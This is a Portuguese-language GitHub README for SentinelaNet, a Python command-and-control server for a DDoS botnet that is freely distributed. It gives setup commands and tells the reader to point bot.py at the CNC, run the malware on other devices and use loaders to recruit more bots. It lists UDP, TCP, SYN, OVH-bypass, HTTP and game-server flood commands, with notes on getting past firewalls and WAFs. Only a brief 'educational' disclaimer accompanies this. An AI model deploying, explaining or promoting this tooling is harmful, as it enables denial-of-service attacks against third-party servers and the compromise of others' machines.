SentinelaNet
SentinelaNet é uma CNC (Comando e Controle) em Python, projetada para gerenciar um malware que realiza ataques de disparos em massa (DDoS).
Install / Use
/learn @CirqueiraDev/SentinelaNetREADME
https://github.com/user-attachments/assets/22f0f21b-e1fc-4b75-9442-4b2ce5c2ee9c
</p> <p>Esta Botnet é para ser uma versão aprimorada do KryptonC2 e será disponibilizada publicamente e de forma gratuita.</p> </div> <br>Instalação 📁
git clone https://github.com/CirqueiraDev/SentinelaNet
cd SentinelaNet
pip install colorama
python3 cnc.py 1337
Os logins são salvos em logins.txt no formato "username:password" dentro do arquivo logins.txt
<br>Configure o malware 💣
-
Mude o IP e a porta do bot.py com o IP (IP publico se não for um teste local) e a porta do seu servidor CNC depois salve o arquivo.
-
Depois execute o malware em outro dispositivo que suporte python (caso o alvo não tenha o python você pode tentar compilar o malware)
-
Tente usar <a href="https://github.com/CirqueiraDev/botnet-exploits">Scanners e Loaders</a> para carregar mais bots. OBS: não é possivel gerar um binario TOTALMENTE estático com python PURO!
<div align="center">
Admin/root Commands
Command | Description --------|------------ !admin, !adm | Shows list of admin commands !user, !u | Add/List/Remove users !blacklist, !bl | Add/List/Remove blacklisted targets
CNC Commands
Command | Description --------|------------ help, ? | Shows list of commands botnet | Shows list of botnet attack methods bots | Shows all conected bots stop | Stop all your floods in progress clear, cls | Clears the console window screen exit, logout | Disconnects from the C&C server
Attack Commands
Command | Usage | Description ---------|-------|------------- .UDP | <target> <port> <time> | Starts UDP Flood Bypass .TCP | <target> <port> <time> | Starts TCP Flood Bypass .OVHUDP | <target> <port> <time> | Starts OVH UDP Flood Bypass .OVHTCP | <target> <port> <time> | Starts OVH TCP Flood Bypass .MIX | <target> <port> <time> | Starts TCP and UDP Flood Bypass .SYN | <target> <port> <time> | Starts TCP SYN Flood .HEX | <target> <port> <time> | Starts HEXdecimal Flood .VSE | <target> <port> <time> | Send Valve Source Engine Protocol .MCPE | <target> <port> <time> | Minecraft PE Status Ping Protocol .FIVEM | <target> <port> <time> | Send FiveM Status Ping Protocol .HTTPGET | <target> <port> <time> | Starts HTTP/1.1 GET Flood .HTTPPOST| <target> <port> <time> | Starts HTTP/1.1 POST Flood .BROWSER | <target> <port> <time> | Starts HTTP/1.1 BROWSER Simulator Flood
</div> <br>📌 Sobre os ataques Ataques Implementados
🔹 Ataques Baseados em Rede (Camada 3 e 4 - UDP/TCP)
🟢 UDP Flood (attack_udp_bypass)
- Envia pacotes UDP de tamanhos variados para sobrecarregar o alvo.
- Pode ser mitigado por firewalls e rate-limiting de ISPs.
🟢 TCP Flood (attack_tcp_bypass)
- Envia pacotes TCP continuamente para esgotar conexões do alvo.
- Se não houver handshake adequado, pode ser bloqueado facilmente.
🟢 SYN Flood (attack_syn)
- Envia requisições SYN para exaurir conexões TCP pendentes.
- Eficaz contra servidores mal protegidos.
- Firewalls modernos usam SYN Cookies para mitigar.
🟢 Ataque Híbrido (attack_tcp_udp_bypass)
- Alterna entre TCP e UDP para confundir defesas.
- Pode evitar filtros estáticos, mas ainda é detectável por análise comportamental.
🟢 OVH TCP Flood Malformado (attack_ovh_tcp)
- Envia requisições HTTP falsas (PGET) com caminhos anômalos (/0/0/0/0, \0\0\0\0).
- Aleatoriza bytes (0x00 a 0xFF) e terminadores de linha para burlar WAFs.
- Usa múltiplas conexões TCP (connect, connect_ex) para saturar o servidor.
- Mitigação: Firewalls com filtro de métodos HTTP inválidos e rate-limiting.
🟢 OVH UDP Flood com Payload Aleatório (attack_ovh_udp)
- Inunda a porta alvo com datagramas UDP contendo payloads aleatórios (até 2048 bytes).
- Não requer handshake, dificultando rastreamento.
- Eficaz contra serviços UDP expostos (DNS, VoIP).
- Mitigação: Bloqueio de tráfego UDP não essencial e análise comportamental.
🟢 OVH Ataque Híbrido (OVHTCP + OVHUDP)
- Combina
attack_ovh_tcpeattack_ovh_udpem threads paralelas. - Objetivo: Confundir defesas estáticas (ex: firewalls que bloqueiam apenas TCP).
- Mitigação: Soluções anti-DDoS com detecção de padrões híbridos (ex: Cloudflare). <br>
🔹 Ataques em Aplicações (Camada 7 - HTTP)
🔵 HTTP GET Flood (attack_http_get)
- Simula acessos massivos a um site para sobrecarregar o servidor.
- Pode ser mitigado por CAPTCHA, Cloudflare e Rate-Limiting.
🔵 HTTP POST Flood (attack_http_post)
- Simula envio de dados para consumir processamento do servidor.
- Mais difícil de mitigar que GET, mas pode ser bloqueado com autenticação ou regras de firewall.
🔵 Browser Emulation (attack_browser)
- Simula tráfego de um navegador real para burlar proteções básicas.
- Pode enganar bloqueios simples, mas não funciona contra defesas avançadas.
🔹 Ataques Específicos para Jogos
🎮 FiveM Attack (attack_fivem)
- Explora vulnerabilidades no protocolo de comunicação do FiveM.
- FiveM tem melhorado suas proteções, mas servidores mal configurados ainda podem ser afetados.
🎮 Minecraft PE Attack (attack_mcpe)
- Envia pacotes corrompidos para explorar falhas na rede do jogo.
- Pode afetar servidores sem proteção adequada, mas padrões desse ataque já são bloqueados em alguns serviços.
🎮 VSE Query Flood (attack_vse)
- Explora o protocolo de consulta de servidores de jogos para gerar carga excessiva.
- Muito utilizado contra servidores Source Engine (CS:GO, TF2, etc.).
⚠️ Nota: Este projeto é apenas para fins educacionais e de pesquisa. O uso indevido pode ser ilegal e resultar em penalidades legais. Sempre utilize conhecimento de segurança para proteger sistemas, não para atacá-los.
<br>Novidades ✨
-
Atualizado CNC
- Adicionado blacklist
01/03/2025 - Atulizado comando bots
02/05/2025- Agora o comando
botsexibe a quantidade de bots atualmente conectados ao C2, e organizados por arquitetura do sistema (por exemplo:x86_64,arm,mips) (também mostra a quantidade em cada arquitetura).
- Agora o comando
- Comando STOP adicionado
09/05/2025
- Adicionado blacklist
-
Atualizado Payload
- Atualizado Browser Flood
01/03/2025 - Atualizado UDP Flood Bypass
06/03/2025 - Atualizado UDP Flood removed
06/03/2025 - Adicionado TCP and UDP Flood Bypass
07/03/2025 - Atualizado SYN Flood
07/03/2025 - Adicionado OVHUDP and OVHTCP Flood Bypass
04/05/2025 - OVH BUILDER Fixed
09/05/2025
- Atualizado Browser Flood
Owner
- Discord: Cirqueira
- <a href="https://www.instagram.com/cirqueirax/">Meu instagram</a>
